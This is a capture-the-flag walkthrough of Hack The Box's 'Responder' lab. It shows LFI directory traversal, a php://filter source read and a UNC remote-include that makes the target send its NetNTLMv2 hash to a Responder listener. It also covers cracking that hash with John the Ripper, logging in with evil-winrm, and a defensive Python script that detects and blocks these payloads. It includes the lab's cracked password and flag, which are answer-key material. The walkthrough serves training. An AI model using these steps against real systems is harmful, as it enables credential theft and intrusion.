Hack The Box Starting Point: Responder

Responder is a machine in Hack The Box's Starting Point Tier 1. It walks through capturing NetNTLM hashes when the target is tricked into authenticating to a malicious SMB server that we set up, and along the way it offers useful insights into local file inclusion (LFI).

Project information

  • Title: Responder
  • Organizer: Hack The Box
  • Project date: June, 2023
  • URL: www.hackthebox.com
To obtain the VPN profile for connecting to Hack The Box, please follow these steps:
  1. Click on the "HTB" button located in the top right corner.
  2. From the options, select "Starting Point".
  3. Choose "OpenVPN" and click on it.
  4. Finally, click on the "Download VPN" button to acquire the VPN profile.
To connect to HTB, for Windows users, download and install OpenVPN Connect and load the VPN profile into the application. Linux users can connect by opening a Terminal and entering the provided command below. Please allow a few minutes for the HTB website to acknowledge the connection.
Begin by initiating a connection to the Starting Point VPN.
sudo openvpn [filename].ovpn
Launch a new tab on your Kali Linux terminal while keeping the current tab connected to your lab session.
Click the green "Spawn Machine" button to start the target machine's spawning process. Remember that the IP address for the target machine is 10.129.174.147. However, use the IP address you have received, as it may differ from the provided one.
Task 1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer: unika.htb
At this time, we will proceed with conducting a standard Nmap scan.
nmap -sS -p- -sV -sC 10.129.196.141
The website is inaccessible because the redirect target unika.htb does not resolve; we can fix this by adding an entry to the hosts file with the following command.
echo "10.129.196.141 unika.htb" | sudo tee -a /etc/hosts
An alternative method to modify the hosts file is by manually visiting the location /etc/hosts and adding the entry directly.
After including the entry in the hosts file, the website became accessible.
Task 2: Which scripting language is being used on the server to generate webpages?
You can identify the scripting language used on a server to generate webpages by using either the Wappalyzer browser extension or the Nikto command-line tool. Wappalyzer analyzes webpage elements, while Nikto focuses on web server scanning and vulnerability assessment.
Answer: php
Task 3: What is the name of the URL parameter which is used to load different language versions of the webpage?
When we change the language to German, we can observe that the parameter used is 'page'. Page serves as the query parameter, and we can provide the language as its value.

Answer: page
Task 4: Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
The question lists several candidate values, but the one that demonstrates Local File Inclusion is the directory-traversal path: the repeated `../` sequences climb out of the web root so that a local file which should not be reachable through the web server, here the Windows hosts file, gets included.
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
To delve deeper into the topic, let's conduct a Google search to gather additional information.
Based on the information obtained from Wappalyzer, we can identify that the server is running Apache. While exploring, I came across an intriguing website. However, I have decided to utilize the solution provided for Task 4, as it involves finding a file that should exist on the system.
Since it works, we could attempt to perform directory traversal by removing this part of the URL and exploring further.
After that success, the same technique can be used to read PHP files that are normally only processed server-side. Simply including a PHP file would execute it rather than display it, so a PHP stream filter that encodes the file is the practical route. In my research, I discovered a valuable website which suggests using the filter value convert.base64-encode/resource=index.php. Applying this filter in the web address returned the base64-encoded source of index.php.
To reveal the original PHP code, decode it with echo <base64 code> | base64 -d. This command decodes the base64-encoded content so the PHP code can be read in its original form.
Task 5: Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: //10.10.14.6/somefile
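As an added example, not code from the HTB box or from this walkthrough, the following Python script shows the defender's side of Tasks 4 and 5 and of the php://filter trick above: it classifies `page` parameter values by shape (traversal, remote/UNC include, php:// wrapper, or plain page name), flags such values in constructed Apache-style access log lines, and demonstrates a hardened replacement for `include($_GET['page'])` that accepts only an allowlisted page name under a fixed directory. The log lines, the directory `/var/www/html/pages` and the allowlist are assumptions made for the illustration.

```python
"""Added example (not part of the HTB walkthrough): classify `page` values, scan logs, harden the include.

Constructed sample data only. PAGES_DIR and ALLOWED_PAGES are hypothetical.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumed (hypothetical) server-side layout for the hardened loader.
PAGES_DIR = "/var/www/html/pages"
ALLOWED_PAGES = frozenset({"english.html", "french.html", "german.html"})

# Constructed Apache-style access log lines exercising the values from Tasks 4 and 5.
SAMPLE_LOG = """\
10.10.14.6 - - [12/Jun/2023:10:01:02 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 1234
10.10.14.6 - - [12/Jun/2023:10:01:09 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fdrivers%2Fetc%2Fhosts HTTP/1.1" 200 822
10.10.14.6 - - [12/Jun/2023:10:01:15 +0000] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 200 0
10.10.14.6 - - [12/Jun/2023:10:01:20 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://")


def classify_include_value(value: str) -> str:
    """Classify an include-parameter value by shape: 'wrapper', 'rfi', 'lfi' or 'benign'."""
    v = value.strip()
    lowered = v.lower()
    # php:// stream wrappers (e.g. php://filter) read or transform local files.
    if lowered.startswith("php://"):
        return "wrapper"
    # Any other URL scheme, or a protocol-relative / UNC path (//host/share), points off-box.
    if SCHEME_RE.match(lowered) or v.startswith("//") or v.startswith("\\\\"):
        return "rfi"
    # Traversal components or absolute paths reach files outside the pages directory.
    normalised = v.replace("\\", "/")
    if ".." in normalised.split("/") or v.startswith("/") or re.match(r"^[a-z]:/", normalised.lower()):
        return "lfi"
    # Everything else (french.html, minikatz.exe) has no include-exploit shape on its own.
    return "benign"


def resolve_page_safely(value: str, base_dir: str = PAGES_DIR, allowed=ALLOWED_PAGES):
    """Hardened replacement for include($_GET['page']): allowlist first, then a containment check."""
    if value not in allowed:
        return None
    full = posixpath.normpath(posixpath.join(base_dir, value))
    # Defence in depth: the resolved path must still lie under base_dir.
    if posixpath.commonpath([full, base_dir]) != posixpath.normpath(base_dir):
        return None
    return full


def scan_access_log(text: str, param: str = "page"):
    """Return (client_ip, kind, decoded_value) for every non-benign include parameter seen."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for val in parse_qs(query).get(param, []):  # parse_qs also URL-decodes %2F etc.
            kind = classify_include_value(val)
            if kind != "benign":
                findings.append((m["ip"], kind, val))
    return findings


if __name__ == "__main__":
    for ip, kind, val in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{val}")
```

The classification is by shape only, which is why "minikatz.exe" comes out as benign: it is not an include payload, and the allowlist in resolve_page_safely rejects it anyway. The allowlist is the real fix; the commonpath check only guards against a future edit that loosens the allowlist into something path-like.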
Task 6: What does NTLM stand for?
Answer: New Technology Lan Manager
We are now approaching the objective of the box, which is to use the Responder utility. Further details on Responder are available here.
Task 7: Which flag do we use in the Responder utility to specify the network interface?
Answer: -I
Task 8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?
Answer: John The Ripper
Task 9: What is the password for the administrator user?
To find the answer, we can initiate the Responder utility by executing the following command:
responder -I tun0
This command starts Responder's listeners (SMB, HTTP and others) on the tun0 interface and waits for the target to authenticate to them. Note that not every listener will necessarily be reachable, depending on permissions and other factors on the victim's system.
Next, we will proceed to run the following URL in the browser :
"unika.htb/index.php?page=//<Responder_IP>/somefile", replacing <Responder_IP> with your Responder machine's IP address.
Once the target connects, Responder displays the captured NetNTLMv2 hash.
After saving the captured hash to a new file, we can run John the Ripper against it with a wordlist to recover the password.
Answer: badminton
Task 10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?
Answer: 5985
Submit root flag
To retrieve the root flag, we can utilize the following command:
evil-winrm -i 10.129.196.141 -u Administrator -p badminton
As we are currently connected to a PowerShell session, we can utilize commands like `cd..` to navigate through the directory structure and search for the root flag.
Ultimately, I managed to find and access the root flag, effectively compromising the Responder box.
Flag : ea81b7afddd03efaa0945333ed147fac
Achievement
Thank you for taking the time to read this. I can be reached on